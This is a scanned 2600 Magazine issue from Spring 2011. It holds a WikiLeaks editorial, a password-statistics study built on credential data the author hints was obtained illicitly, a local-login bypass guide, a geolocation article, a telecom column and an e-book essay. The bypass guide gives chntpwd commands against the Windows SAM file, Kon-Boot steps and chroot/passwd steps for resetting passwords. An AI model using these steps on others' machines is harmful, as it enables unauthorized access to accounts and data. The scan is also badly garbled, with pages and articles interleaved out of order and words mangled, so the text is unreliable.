You would have had to have been in a

coma or a deep state of denial to not be aware
of the massive changes that have been taking
place this year in various parts of the world.
Regimes have toppled and people everywhere
have become empowered to speak their minds
and express their dissatisfaction. Few among
us would see this as a bad thing. Yet it is but
one of the offshoots of last year's controversy
of leaked cables and intelligence, viewed by
many then as treasonous and worthy of the
harshest possible penalty.
Was WikiLeaks the sole cause of all of
this global mayhem? Certainly not. The entire
region has been a tinderbox for ages, and citi-
zens learning the truth about their government
was but one spark that helped to ignite the
flame. WikiLeaks, in their actions, dissemi-
nated a good amount of this type of truth to
people in countries everywhere. The ingredi-
ents for a tumultuous reaction were already
in existence, albeit dormant from so many
years of inattention. All it took was a little
official confirmation. A June 2008 cable from
the United States embassy in Tunis outlined
the extensive corruption within the Tunisian
government. The cable was released to the
world in early December. Massive antigovern-
ment demonstrations soon followed, leading
to the toppling of the regime in January. The
winds of change continued to blow throughout
the region, overthrowing the 30-year reign
of Hosni Mubarak in Egypt despite stubborn
resistance from a leader who couldn't seem
to grasp what was happening to his controlled
environment. Then it was Libya's turn, where
all hell broke loose. All told, no less than a
dozen countries were affected by the unrest,
Page 4
many making key changes in leadership and
policy in reaction to the growing anger. The
rest of the world watched, waited, and reacted.
There were relatively few parts of the
planet where these momentous events were not
seen as a good thing overall. Finally, people
had woken up and toppled oppressive dictator-
ships, hopefully instilling more free and open I
societies. The volatile reaction started with the;'
revelation of that one little bit of honesty. No
doubt its release would have been branded as
an unacceptable risk to national security by the
powers that be, just as virtually every leak last
year was. The truth can certainly hurt. But the
truth also has a way of setting people free. It's
all about accountability, after all. When the
lies are exposed - and they most always are
exposed - will the leaders and regimes have .,
enough public support to weather the storm?
Or will these revelations be the straw that
broke the camel's back? Whichever it turns out
to be, blaming the messenger - or giving him
all of the credit - is ignoring the plainly visible
reality. We're familiar with this problem.
The hacker world has long been all about
exposing the truth in its various flavors. We're
told to accept insecure systems, to not touch
things we're told not to touch, to keep our
knowledge and discoveries confined, and,
above all, to just play the game and keep our
mouths shut. Clearly, that doesn't work for
most ofus. Ifsomething is broken or ifsecurity
is nonexistent or insufficient, we tell the world.
Learning is all about touching things that are
off-limits, something many of us do for the
first time as toddlers. There is no fun or joy in
any of it if we can't share our discoveries and
observations with everyone who will listen.
-------- 2600 Magazine
And, as for playing the game, a lot of hackers
simply prefer to make their own games. This is
the culture we have formed.
Those who don't get it, those who fear
the unknown, those who find themselves in
power over systems that may not be nearly
as robust as previously thought. .. they are the
ones leading the charge to clamp down hard
on anyone who would dare to step outside the
norm. In far too many cases, they are the ones
taken seriously in the mainstream. Hackers are
viewed as the true threat to our way of life,
rather than the poor programming and lack of
concern for security and privacy that domi-
nate. In an incredible example of this short-
sightedness.Secretary of State Hillary Clinton,
in addressing the momentous events in the
world previously alluded to, managed to casti-
gate hackers in the same breath as those who
cut off Internet access and even torture oppo-
nents of oppressive regimes. It's clearly all
just wordplay and a desperate attempt to have
one's cake and eat it too. After all, if you view
hackers as a positive force in getting the truth
out in one situation, how can you turn around
and call them a threat back home? If leaks
about corruption lead to a positive change in a
distant land, how can we be so quick to assume
such revelations will only cause harm within
our own borders? Somehow, those who wish
to stay in control no matter what must figure
out a way to profit from the reactions while
condemning the actions that provoked them.
It's a tricky game, to say the least.
As always, we face the danger of falling
into the traps that are set. We're all quite
familiar with the inaccurate definitions of
hackers that the mass media helps to spread.
We must continue to do everything possible to
correct this perception and reach people on our
own terms. Lately (and as seen in the Clinton
comments), the attempt to tie hacking with the
cutting off of Internet access has gained steam.
It's relatively easy to disrupt the Internet
connection of an organization like WikiLeaks
or even a large corporation like MasterCard.
And there is no shortage of people willing
to say they did this in the name of hackers,
even though it doesn't take much in the way
of skill to do such a thing. Unlike legitimate
forms of social protest, such as sit-ins and civil
disobedience, there is no act of courage in
anonymously running a script and disrupting
communications somewhere. It's simply an act
of sabotage, and, in fairness, there are many
who would argue that such acts are appropriate
at times. Regardless, it isn't hacking, and it's
Spring 2011
not an attempt to open dialog or get the truth
out. It's the kind of tactic we should actually
be fighting, where the goal is to silence people
or viewpoints. After all, one doesn't counter
"bad" speech by banning it, but rather by
spreading more "good" speech. If the truth is
indeed on our side, then getting our words out
along with as many facts.as we can find ought
to be sufficient. And if it isn't, then we need to
try harder. But we should never become what
we have been labeled as by those who fear our
actions. That's a trap that's extremely difficult
to escape from.
We're living in a very different world
today, one that even hackers and technological
experts are probably quite surprised by. Revo-
lutions being organized via Twitter and Face-
book, crucial footage making its way to the
rest of the world through YouTube, cell phones
being as vital a tool as megaphones in reaching
the masses... the technology especially snuck
up on the people who supposedly were in
control. Their reactions, though, were predict-
able and not at all unlike those of anyone who
finds their little fiefdoms being challenged,
whether it's an entire country, a classroom, or
an office. Frequently, access to technology was
either cut, restricted, or clumsily hijacked. But
all that was accomplished was that more fuel
was added to the fire. When someone's reac-
tion to a conflict is to cut off communications
or attempt to drown it out, they have clearly
run out of things to say and have already lost
the argument. We are so far quite lucky that it's
individuals who have the upper hand when it
comes to using technological tools and getting
around the restrictions. At some point, govern-
ments are going to learn to do a far better job
at controlling technology, and we must learn
to recognize the warning signs. Every restric-
tion we agree to, every extra bit of power and
control we give away... it can all be turned into
a weapon against free speech at some point.
And like any weapon, it's not likely to go away
once it's put into place.
The world is a better place with more
potential for positive change and the ability
for justice to be served, precisely because of
those with the courage to help get the truth out.
For every bit of information whose revelation
causes mayhem in one circle, there is another
place where it's a potentially vital part of
justice. The one fact we should all be able to
agree upon is that the information that's out
there is now reality. We should honestly try to
deal with that.
PageS
47.53%
48.89%
8.66%
Character Usage
Special characters:
Numbers:
Mixed case:
This isn't surprising in the least. I know many
non-technical people that will take a word, slap a
few numbers at the end, and use it for their pass-
word. What really blows me away is that when you
combine these last two statistics, 26.27 percent of
passwords are represented. I saw dictionaries out
there that covered many more words than mine
had, so this number can only get larger. That means
that one quarter of the time, you can crack some-
one's password using a simple dictionary attack
that only requires a couple of million attempts.
This is by no means fast, but it pales in comparison
to a password that doesn't contain a dictionary
word/variant.
Another common thing I saw while I was
parsing all these files into a common format were
dates. This got me wondering how many people
actually used a date as their password. It turns out
that only 6.21 percent of these passwords were
dates or years. This is by no means a huge amount,
but the space that you'd have to search for past
dates is just over 700,000, which again is a small
space when compared to passwords using more
characters.
The last statistic, and the one that makes good
passwords great, is a mix of characters. If a pass-
word contains a broader range ofcharacters (letters,
numbers, special characters) then the search space
grows significantly. So, do people make good use
of this?
Page 7
The "Mixed Case" statistic caught my eye
because it was much lower than I expected. I went
back and started tracing statements in my code to
see ifI was doing something wrong. It turns out the
number is correct and there are a few things that
can account for it. Users might be creating pass-
words that are mixed case, but the places storing
this information may not be storing them in mixed-
case format. The practice ofusing mixed case auto-
matically adds another 26 potential characters to
the password, and should be utilized often.
The fact that nearly one half of users are using
special characters is good, since it's another way
to further expand the space a potential attacker has
to search. The same goes for numbers. I suspect
there is a lot of overlap in the "Special Character"
and "Numbers" statistics, and even some with the
mixed case number as well. People who follow
good password practices will have at least one of
each in their passwords.
9 letter passwords: 14.54%
10 letter passwords: 4.27%
2.15%
0.88%
0.71%
0.66%
0.58%
1) password:
2) sunshine:
3) princess:
4) shadow:
5) welcome:
Close Dictionary Matches (+- 2 characters)
Total close matches: 12.53%
6 letter passwords: 22.56%
7 letter passwords: 30.92%
8 letter passwords: 27.71%
Spring 2011
I can't believe that out of all the words in the
dictionary, "password" is the most used for pass-
words still to this day. Actually, considering some
of my users, it's not surprising in the least. One
thing worth noting is that there is a great diffusion
of passwords all across the dictionary, with "pass-
word" being the only word that accounted for more
than one percent of the entries. On a similar note,
passwords containing close matches to dictionary
words met my expectations.
Top 5 Dictionary Matches
This statistic is surprisingly higher than I
thought it would be. Regardless of length, using a
word found in a dictionary is a huge password faux
pas, so to see more than one eight ofpasswords fall
into that category was surprising.
This is about how I expected the passwords
to be distributed, actually. One thing I do wonder
is if password rules on some of the sites this data
is from is skewing the results a bit, or if users are
picking passwords that are six to eight characters
on their own. While a password that is only six
characters long won't stand up very long to a brute
force attack, eight characters will do pretty well.
The next thing I looked at was how many pass-
words were using dictionary words. I used a stan-
dard English;.-dictionary, but stripped of any word
that was under four characters long to get a better
idea of what actually is a match and what was just
coincidence. In addition to checking for exact
dictionary matches, I also checked passwords that
contained dictionary words and a modifier of at
most two characters. So the password "bicycle54"
would count as a partial dictionary match, but
"1$bicycle54" would not count. So, how did these
passwords stand up to the mighty dictionary?
Exact Dictionary Matches
Total exact matches: 13.74%
5 letter words: 13.52%
6 letter words: 43.87%
7 letter words: 24.40%
8 letter words: 18.21%
9: 10.36%
10: 6.16%
11: 2.18%
12+: 2.24%
---.
2600 Magazine
while back there was a data set leaked containing
millions of passwords about users from a single
site, and a lot of conclusions about password (in)
security were made. If my undergrad statistics
course taught me anything, it's that the results are
only as good as the data, so it was very important
that I ensure my data set be as diverse as possible.
Also, as a quick note, I won't say how I got my
hands on all this beautiful data, but please feel free
to use your imaginations....
The tools I use to analyze the data are home-
grown Windows apps written in C#, and are largely
used for CSV manipulation and basic statistical
analysis. The process to get all the data together
was an arduous one, and required spending a lot
of time parsing different data formats and pulling
only the information I wanted from the records
(username and password). In the end, though, I
was left with a huge .csv file ready for tearing apart
and inspecting. And what a wealth of information
it turned out to be!
Results
For the most part, the results are about what
I was expecting, though there were a few strange
statistics that made me think a bit. The first thing I
looked at was the distribution ofpassword lengths.
While it's the simplest statistic, it's probably one of
the most important factors in determining ifa pass-
word is good or bad since passwords that aren't
long enough have the potential to be brute-forced
in a trivial amount of time.
Passwords By Length
1-3: 0.14%
4: 3.35%
5: 5.09%
6: 26.27%
7: 18.93%
8: 25.28%
Recently I've heard a lot of talk, both on the
Internet and around the water cooler, regarding
password security and how bad it is. Not to say that
using a username and password is a bad method
of securing resources, but most folks are claiming
that users are choosing poor passwords. This got
me thinking; how bad are passwords out there in
the wild, really? Is there actually a pandemic of
stupidity among users that needs to be addressed?
Criteria
Before we jump into making value-based judg-
ments about passwords, we better lay down some
ground rules about what makes a password good,
and what makes it worthless. You may agree or
disagree with these criteria, but the things that
come to my mind right away are, a password of
sufficient length, containing mixed upper and
lower case, and containing special characters. On
the other hand, things that make a password bad
include using dictionary words, dates, or a pass-
word that is the same as the username or a slight
variant.
Methods
So we're on this journey to find out how bad
passwords actually are in the wild, and we have
laid down specific rules about what makes a pass-
word good or bad, so now let's talk about the data
set I use and the methods by which I gather infor-
mation. The data set is relatively large and contains
credentials from multiple websites, none of which
have much, if any, user-overlap (meaning each site
caters to a different crowd; the credentials aren't
all from, say, music sites). That's one ofthe biggest
things going for this experiment, in my opinion. A
Page 6---------------------
Page 9
lleferences
www.piotrbania.com/a11/kon-boot/
en.wikipedia.org/wiki/Winterna1s
en.wikipedia.org/wiki/Chroot

Thanks to Canola for all your help.
while before I realized I had to press the "anykey".
I pressed "Enter" and the system continued to boot.
It will seem like the system is booting normally
and you will end up at the login screen you are used
to. There is one difference at this point: You don't
need a password to login. Just choose a user and hit
"Enter". You are now logged in as that user.
When you are done doing whatever it is that
you need to do, just restart the computer without the
CD in the drive. The system is back to normal with
the original passwords. According to the Konboot
website, Konboot has been tested on Windows
XP, Vista, Windows 7, Windows Server 2003, and
Windows 2008. It's also worth mentioning that
there is a version on Konboot for Linux systems.
Other ways to get through the login screen on
a Linux system is with chroot. Available either by
default or through repositories, chroot allows you
to change what the system sees as the root direc-
tory. Boot a LiveCD containing chroot and mount
the hard drive partition that contains the Linux OS
that you want access to. If the partition is mounted
to /media/disk, then open a terminal screen and run
chroot /media/disk. Now, anything you do
in that terminal will act as though it is running on
the system you have chrooted to.
At this point, you can use the passwd command
to change a user's password much like we did
with chntpwd for Windows. The command would
be typed like this: pas swd username. Replace
usemame with the user's name that you could like
to change. Type the new password and confirm it
by typing it a second time. This will successfully
change the password.
We've looked at a number of different ways
we can bypass the local security on most systems.
The question arises, "How do we protect ourselves
from these types of attacks?" One way is to set a
BIOS password. This is a good deterrent, but there
are ways around that, too.
I believe that encrypting your hard drive is the
best policy. This will stop all the attacks I have
listed above. Although I'm not familiar with the
process on a Windows install, some Linux oper-
ating systems such as Debian give you the option
during the install process to encrypt the hard drive.
This is a simple way to protect your data. Things
such as cold boot attacks are still possible, but less
common than the other attacks. Cold boot attacks
also require the system to be on and logged in
already to work.
If you do encrypt your hard drive, be sure to
remember your password or you're screwed.
list you have, you won't ever crack it.
As an alternative, you can change or clear
a user's password. I used to use a bootable CD
called ERD Commander by Winternals. ERD
Commander is like a Windows version of a Linux
LiveCD. It would boot and ask where Windows
was installed and then I could edit the registry or
use a program called Locksmith that allows you to
change a user's password. ERD Commander had a
few other features too, but these were the only ones
I really ever used.
The thing that drove me crazy about ERD
Commander was that it was, like Windows itself,
very slow. You could wait five minutes for it to
load sometimes. So, once chntpwdcame along I
stopped using ERD Commander. chntpwd is a
Linux utility-to reset a Windows user's password.
It also has the ability to edit the registry on a
Windows computer.
So you could use a Linux LiveCD once again to
boot the machine. Most distros will have chntpwd
installed or in the repositories. Just navigate to
the folder where the SAM file is located and type
chnt pw -1 s am. This will give you a list of all
the Windows users for the system and some infor-
mation about their accounts. Now you can type
chntpwd -u username sam to edit a user's
account (replace username with the user's name).
From this point on you can just follow the onscreen
instructions. You will have the options to blank
their password, change their password, or upgrade
their account. It is suggested that you blank their
password rather than change it. Changing the pass-
word doesn't always work. But, if you blank their
password you can always set a new password once
you have logged into their account on the Windows
side. When chntpwd asks ifyou would like to hive,
choose yes. This will save your changes.
Upgrading or downgrading a user's account will
give or take permissions from the user. chntpwd is
a faster alternative to ERD Commander. It also
gives you the ability to clear/blank the password
on Vista systems whereas ERD commander does
not work on Vista systems.
The big stumbling block with both of these
options is that they change or clear a user's pass-
word. So, the next time that user tries to login, they
won't be able to since their password has been
changed. You won't be able to change their pass-
word back since you don't know their password (if
you did, you would have no need for either ofthese
programs).
We have another option in a very small bootable
ISO image called Konboot. Konboot can be down-
loaded in a very small zip file. It's about 8.7KB
zipped up. Once downloaded, unzip the ISO file
and burn it to a CD using your favorite CD burning
program. When you put this CD in a computer and
boot from it, you will first see a boot screen that
has a big logo that says, "kryptos Logic" with a
scrolling banner below it. I sat at this screen for a
Spring 2011
.........
Developers are going to take the brunt of the
responsibility if things are to change. Since it's up
to them to create the security policy, enforce these
as standards and - even though they might have to
drag their users kicking and screaming all the way
- passwords in general will become better. Devel-
opers also need to be more aware of the security
risks facing their systems, and have appropriate
policies in place for dealing with passwords (be
it password recovery, too many bad password
attempts, etc.) in a better way. And I'm not trying
to pass the blame or anything. I'm a code monkey
myself, and as painful as it is to admit, the burden
falls mostly to us.
Thanks to all thefolks that make 2600 happen, you
guys/gals rock! And a very special H big ups" to
C.MF. and colonelxc!
The problem arises when you may need more
than just files access on the computer. What if
you have to make changes to the registry, or run
an application that is installed on the computer
already? It's times like these that we may need to
bypass the logging screen on an OS.
Getting someone's password can be a difficult
thing to accomplish. There are programs out there,
such as Ophcrack, that will try and crack a user's
password. It does this by running a dictionary
attack on the file where passwords are stored. In
the Windows OS, this would be the SAM file.
The SAM file can be found under c:\windows\
system32\config\SAM.
The main problem with programs like
Ophcrack is the same problem you have when
trying to perform any dictionary attack. Ifthe pass-
word you're trying to crack isn't in the dictionary
2600 Magazine
Final Thoughts
If anyone has any input regarding the article,
drop me an email at sheep. slapper@gmai1
.... com. I'd love to talk more about it. And the
information in the article can only be as good as
the data behind it, so if some ofyou folks out there
happen to send me more information to work with,
we'll have an even better idea about the state of
password affairs online.
by MetalxlOOO
http://FilmsByKris.com
Conclusion
There are many more statistics we can pull from
this data, but I think I've covered all the big ones.
So, how bad is the state ofonline password security
these days? That'll still depend on who you ask,
but I'd say it could be worse. The things to keep in
mind here is that all these passwords are for online
systems, which increases the time needed to brute
force a password by many orders of magnitude.
So, online password standards are less important
than in other systems (don't get me wrong, using
"password" as your password is just plain idiotic).
But keep in mind that all the big hacks in the past
few months that have compromised high profile
accounts (like Sarah Palin's email, for example)
involve insecurities elsewhere in the system, not
poor passwords.
Considering this, how can people make their
passwords more secure? Well, a good start is to
use passwords that are of sufficient length (I'd
say nothing under eight characters long) and use
at least one number, special character, and upper/
lower case character in the password. Nothing adds
time to a brute force job faster than expanding the
set ofcharacters the password can contain! None of
what I just said is new or exciting, but users are still
showing either a lack of knowledge or complete
disregard for basic password policy.
It doesn't take much to sit down at a computer
and bypass pretty much any security that may be
set up for the local accounts. There are a variety of
Linux distros available, on the Internet, in LiveCD
format. You can pop one of these CD into pretty
much any computer and have full control.
All modem distributions of Linux have the
ability to read and write to a large list of file
systems including NTFS. Linux also gives you
more control over the files on the system since it
gives you access to folders on a Windows machine
that you wouldn't have access to even as adminis-
trator of the Windows OS.
Page 8---------------------
AS name AS
32748 STEADFAST
13538 TELEHOUSE
23504 SPEAKEASY
23504 SPEAKEASY
Hostnarne
vl600. corel. nyc01. steadfast. net
nyiix. ge-0-2 -0. cr2. nyc l . speakeasy. net
ge- 2 - 0- 0 . cr2 . wdc 1. speakeasy. net
220. ge-3 -0. er1. wdcl. speakeasy. net
NS2.Z0NEEDIT.COM
69.72.158.226#53
geospoof.org
216.98.141.250
--------------------Page11
Spring 2011
This information in WHOIS for geospoof.org is bogus except for the name servers. Use one of those
name servers and lookup geospoof.org several times:
# nslookup
> server NS2.Z0NEEDIT.COM
Default server: NS2.Z0NEEDIT.COM
Address: 69.72.158.226#53
> geospoof.org
Server:
Address:
Name:
Address:
Hop TCP UDP ICMP Real Time IP
time
2 1. 7 1. 5 1. 4 1. 4 +1. 4 67. 202 .117 . 17
3 1.6 2.2 2.1 1.6 +0.2 198.32.160.119
4 7.8 7.8 7.9 7.8 +6.2 69.17.87.22
5 9.7 9.3 9.2 9.2 +1.4 69.17.83.46
6
7
8
Destination unreachable
The traceroute was blocked and was unable to reach its final destination, but the hostnames in hops
4 and 5 indicate that the target IP is located in the WDC area. (The traceroute was performed with the
WorldIP Firefox plugin.)
Now let's see what geolocators have to say about 66.92.163.234. These four free geolocators were
easily found with Google and they all allow unlimited lookups:
http://www.geobytes.com/ipLocator.htrn

http://www.topwebhosts.org/tools/ip-locator.php
http://whatisrnyipaddress.com/
All four geolocators were requested to provide the location of 66.92.163.234 and here are the results:
geobytes Washington, DC
ipinfodb Silver Spring, MD
topwebhosts Ashburn, VA
whatismyipaddress Rockville, MD
That is not exactly pinpoint accuracy for an IP address in Arlington, Virginia, but all locations are
probably within 20 miles of Arlington. A commercial concern that targets specific regions with local
advertising would think that geolocation works very well.
Now let's look at how well geolocation does with locating a web server. The location ofthe web server
shown below will be attempted without the use of geolocators:
http://geospoof.org
Here is a fragment of the WHOIS record for geospoof.org:
# whois geospoof.org
[snip]
Tech ID:tultDEX6uQuRBJgV
Tech Name:Hollie Dewers
Tech Organization:Dogs R Us
Tech Street1:101 Bow Wow Way
Tech Street2:
Tech Street3:
Tech City:Pittsburgh
Tech State/Province:Pennsylvania
Tech Postal Code:15218
Tech Country:US
Tech Phone:+412.3718139
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:holliedewers@aol.com
Name Server:NS2.Z0NEEDIT.COM
Name Server:NS4.Z0NEEDIT.COM
#
The WDC (Washington, DC) keyword seems to be a big clue. Now look at a traceroute from New York
to 66.92.163.234 shown below:

.: "illi" "",,,,,, ,, " il""";' ''' ''i$'i,, <,i ,I'd
t«f1 of the rea/-world geographic-location of an
computer, mobile device, website visitor or other. IP address geolocation data can include informatid
such as country, region, city, postal/zip code, latitude, longitude, and timezone. "
Wikipedia also describes how geolocation works:
"Geolocation can be performed by associating a geographic location with the Internet Protocol (IP)
address, MACaddress, RFID, hardware embeddedarticle/production number, embeddedsoftware number
(such as UUID, Exif/IPTC/XMPor modern steganography), invoice, Wi-Fi connection location, or device
GPS coordinates, or other, perhaps self-disclosed information. Geolocation usually works by automati-
cally looking up an IP address on a WHOIS service and retrieving the registrant sphysical address. "
The availability of a MAC address for a geolocation service (geolocator) to use seems dubious and
Wikipedia fails to mention the traceroute utility. Wi-Fi connection locations and GPS coordinates are
likely being utilized by some geolocators, but at present, a key component of geolocation is the WHOIS
service. Wikipedia has this to say about WHOIS:
HWHOIS (pronounced as the phrase who is) is a query/response protocol that is widely used for
querying databases in order to determine the registrant or assignee of Internet resources, such as a
domain name, an IP address block, or an autonomous system number. WHOIS lookups were traditionally
performed with a commandline interface application, andnetwork administrators predominantly still use
this method, but many simplifiedweb-basedtools exist. WHOIS services are typically communicatedusing
the Transmission Control Protocol (TCP). Servers listen to requests on the well-known port number 43.
The WHOIS system originatedas a methodfor system administrators to obtain contact informationfor IP
address assignments or domain name administrators. "
It is important to note that geolocators do not rely on WHOIS information for a domain name.
However, they can use information from WHOIS for an IP address assigned to a domain name.
The typical Internet home user will subscribe to Internet access from an Internet Service Provider
(ISP). The ISP will assign, either statically or dynamically, an IP address to the subscriber. The home user
has no control over the information contained in the WHOIS database for their IP address.
Let's see what can be discovered about a specific IP address without using geolocators. Consider the
following static IP address assigned by Speakeasy for use in Arlington, VA:
66.92.163.234
First, the Linux whois command line tool will be used to query the WHOIS database:
# whois 66.92.163.234
Speakeasy, Inc. SPEAKEASY-5 (NET-66-92-0-0-1)
66.92.0.0 - 66.93.255.255
WDC BRIDGED CIRCUITS SPEK-WDC-BR-19 (NET-66-92-163-1-1)
66.92.163.1 - 66.92.163.255
# ARIN WHOIS database, last updated 2010-04-21 20:00
# Enter? for additional hints on searching ARIN's WHOIS database.
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at https://www.arin.net/whois_tou.htrnl
#
Page 10 2600 Magazine
Name: geospoof.org
Address: 69.72.142.98
> geospoof.org
Server: NS2.Z0NEEDIT.COM
Address: 69.72.158.226#53
Name: geospoof.org
Address: 69.72.142.98
Name: geospoof.org
Address: 216.98.141.250
>
Notice that geospoof.org resolves to two different IP addresses (216.98.141.250 and 69.72.142.98) and
that the name server NS2.Z0NEEDIT.COM does not always return the two addresses in the same order.
The 69.72.142.98 address appears to be in Clifton, NJ:
# whois 69.72.142.98
OrgName: FortressITX
OrgID: FORTR-5
Address: 100 Delawanna Ave
City: Clifton
StateProv: NJ
PostalCode: 07014
Country: US
[snip]
And the 216.98.141.250 address seems to be in San Diego, CA:
# whois 216.98.141.250
OrgName: CariNet, Inc.
OrgID: CARIN-6
Address: 8929 COMPLEX DR
City: SAN DIEGO
StateProv: CA
PostalCode: 92123
Country: US
[snip]
Not all geolocators will do lookups on domain names. Many will only do lookups on IP addresses.
From the list of geolocators above, IPInfoDB will look up either a domain name or IP address:
http://ipinfodb.com/index.php
Do a lookup of geospoof.org on IPInfoDB and sometimes it will say that geospoof.org is in Clifton,
NJ and other times it will say that geospoof.org is in San Diego, CA. So the geolocators are confused
because geospoof.org is on two networks and the primary name server for geospoof.org alternates its
answer between the two IP addresses.
The domain or zone management for geospoof.org is provided by zoneedit.com. They provide free
services for up to five domains. More specifically, they provide the primary and secondary DNS name
servers for geospoof.org. Their services also include web forwarding with a cloaking option. The cloaking
option means that the real URL of the web server will not be displayed in the navigation bar.
Geolocators do not follow web forwards. At the time of the writing of this article, the web server for
geospoof.org is in Seattle, Washington. The web page for geospoof.org can be easily moved around the
world and geolocators cannot find it. Of course, any organization can hide the real location of a server
with a private network that connects to the Internet in some distant location. Using geolocation to find the
geographical location of a web server does not work very well.
However, in many cases finding the real location of a proxy web server is not necessary in order to
bypass restrictions. For example, someone in New York might have a need to post an ad on Craigslist
in Los Angeles and geolocation restrictions are preventing this from happening. The solution may be to
find a proxy that geolocation says is in Los Angeles and not be concerned with where it really is located.
The ownership of domain geospoof. org is currently in dispute. Please contact the author at
geospoof@gmail. com ifthe domain does not seem to be related to the article. A correct domain will
be provided.
Page 12 2600 Magazine
Hello, and greetings from the Central
Office! I'm winging my way across the Sea of
Japan on my way back to Seattle. Construc-
tion of the new Beijing Central Office is
nearly complete, and it's time for a trip to
headquarters to discuss the details of our
operation plqn, There is still plenty of work to
do in Beijing, and I will continue to be based
there for some time.
Local number portability is part of our
operation plan. We're building the new
Central Office to be ready to implement it.
Even though there is no local number porta-
bility available in China yet, we expect it to
happen eventually. Unlike in the U.S., there
aren't a bevy of options in China for your
home phone; there is only fixed line service
from China Telecom or China Unicom,
depending on what part of the country you
are in. If you move, your phone number will
change, and you don't even have a choice of
long distance provider (although there are
dozens of dial-around services providing
competitive long distance rates). Youdo have
a choice between three mobile telephone
providers (China Unicom, China Mobile, or
China Telecom), but you're unable to take
your number with you if you switch carriers.
And there is certainly no concept of wire-
line to wireless portability. Skype is popular
(but illegal in China), and VolP services have
not caught on the way they have in North
America.
What a contrast to the United States! Since
1997, when Local Number Portability (LNP)
was first introduced, you've had a choice of
multiple local phone companies. While there
are typically not more than three broadband
choices (typically one cable provider, one
traditional local phone company, and a wire-
less service provider) in major American
cities, you have plenty of choices for home
telephone service. Traditional phone lines,
known as POTS, are a rapidly diminishing
share ofthe market, although this is a compet-
Spring 2011
itive market with numerous companies who
can sell you a local dial tone (although this is
often actually provided by your local phone
company under a reseller arrangement). VolP
service from the local cable provider has
half (or more) of the residential fixed line
market in some cities. Meanwhile, there are
four major nationwide wireless mobile phone
companies (and a couple of dozen smaller
local and regional providers) with a seem-
ingly infinite number of resellers and Mobile
Virtual Network Operators (such as Tracfone,
Boost Mobile, and Straight Talk). Americans
take for granted the ability to keep their phone
number when they switch from a fixed line
to wireless phone, or move from one wireless
provider to another. And the system more or
less works quickly and seamlessly today.
The central nexus ofthe number portability
system is the Number Portability Administra-
tion Center, or NPAC. Run by NeuStar, the
FCC-appointed administrator of the North
American Numbering Plan (NANP), NPAC
is a carrier-neutral one-stop shop for number
portability. NeuStar isn't a phone company,
isn't owned by any phone companies, and
doesn't have an ownership stake in any phone
companies, but makes most of its moneyfrom
phone companies (it also administers the .us
top level domain and runs an Internet DNS
root server among other critical infrastructure
roles).
Prior to local number portability, tele-
phone companies almost exclusively used
a Telcordia publication called the Local
ExchangeRoutingGuide(LERG)todetermine
how to route calls. Based on the NPA-NXX
of a called number, the long distance carrier
looks up the Common Language Location
Identifier (CLLI) for the switch serving the
number you call and the tandem serving
that switch. This is used to route your call.
For example, if you make a call to (206)
386-4656, the carrier would first reference the
LERG, which would then deliver the CLLI of
Page 13
Shout outs to:
• RBCP - love the (cactus?) new book!
(Cactus?)
• Penguin Project - Successful hacker
trip to Antarctica... I'm both incredibly
jealous and incrediblyhappy!
• Telephreak - Bell System Property, Not
For Sale.
Remote and invisible censorship.
That will happen before the book is printed, so
in many cases you don't even get to know about it.
With electronic media, at least you have a chance
PagelS
Format decay (meaning your collection will
be left behind).
I gave up my VHS a very, very long time ago.
I don't regret it. I also gave away my Atari, Master
System, Mega Drive, Nintendo, N64, PC-XT, and
a whole bunch of old stuff. Now I have Blu-ray,
Xbox360, PS3, 50" HDTV, i7, and other cool
things. They are way better, cooler, and more fun.
So why would I want to keep around the old stuff?
There are museums to remind me ofhow much fun
I had with those.
Hardware lock-in.
Again, why would you care if you have the
device and you read the book? Why would you
like to keep it? Do you keep every newspaper and
magazine that gets delivered to your house? I don't.
I read and, if necessary, reread. Then I recycle. So
the hardware lock-in doesn't really bother me,
because, well, I recycle the books, so I won't keep
it around for long.
version would be better than the old dusty one. The
real question is why do we always want to keep
old news, store old stories, and use bunches and
bunches of boxes and space? Just to say, "Oh yes,
I have that book. It's somewhere in a box, in my
attic." History. Do we really need 1000 copies to
keep history? What if everyone took their books
and donated them to local libraries, so every single
one of them would have at least one copy of each
book ever printed? The rest of it would be reused
for something else, and not to accumulate dust in
your attic.
No anonymity.
If you are worried about people knowing what
you are reading, maybe you should not be reading
that. What can they do if they know that you saw
the latest Playboy magazine, or read about PHP?
Probably they could offer you a new Playboy or
a new PHP book, which is not that bad because
you actually read the first one, and there is a good
chance that you will read the other ones if you
knew about them without having to search. But
OK, it's fine - this one I can't say much about since
it's very true.
Why I Like E - b ( ) ( ) k ~
by Oakcool
The difficulty ofloaning books to yourfriends.
This refers to the fact that because of the tech-
nology that applies to the e-books and devices,
there is little or no possibility of loaning. Well, if
you take into consideration what my father told me
more then once when I was little: "Son, you should
never loan books, movies, or anything like that
to anyone. You will forget about it, or they will,
and there are great chances that you will never
see it again." Wise words, since more than once
it happened to me, and I really never saw those
books again. They're probably in some dump site
somewhere and the only thing touching those cool
pages are flies and worms. Now, if we go with
the flow, yes, it would be awesome to be able to
loan e-books. If you put enough pressure on them,
companies might create ways of doing so, through
digital libraries or something like that.
No used bookstore.
The issue here is the need for ownership and
the ability to manipulate the media as you wish.
Now let's think about that a little. You buy a book
or any other media with the primary intent of
getting the knowledge inside it or just to listen to it.
You can obviously say that there are exceptions to
that, but the point is you will need a couple ofdays
to acquire that knowledge and a few day to come
back to it (if it's a technical book, for example).
Once you are done, you are done. I doubt that
you will ever come back to it and read it again if
it is a technical book, as technology and informa-
tion changes. If that book get old, a brand new
Spring 2011
------------------------_•.
Dragom had a very interesting "Transmissions"
column in 27:1 about why he likes printed books.
That made me think a little bit. In the article, six
points are discussed regarding e-books:
1. The di/ficulty of loaning books to your
friends.
2. No used bookstore.
3. No anonymity.
4. Hardware lock-in.
5. Format decay (meaningyour collection will
be left behind).
6. Remote and invisible censorship.
Now let's just say that I understand and even
agree with what was said. There are other points
of view that are of some importance that could be
argued with the same intensity, so here I will try.
~
course, NeuStar doesn't supply this informa-
tion for free. In addition to charging a monthly
subscription fee for access to the database,
they charge a few ten-thousandths of a cent
per dip. This can really add up over millions
of telephone calls a day. Predictably, our
Revenue Assurance department doesn't like
that either, so we take measures to minimize
these costs, which are called "dip fees." After
all, it's not only long distance carriers that get
slammed with NPAC dip fees. Local carriers
have to pay too, because locally dialed phone
numbers (especially wireless phone numbers)
may have been ported. To avoid unnecessary
charges, we don't perform dips on our own
subscribers' numbers and we cache dips for
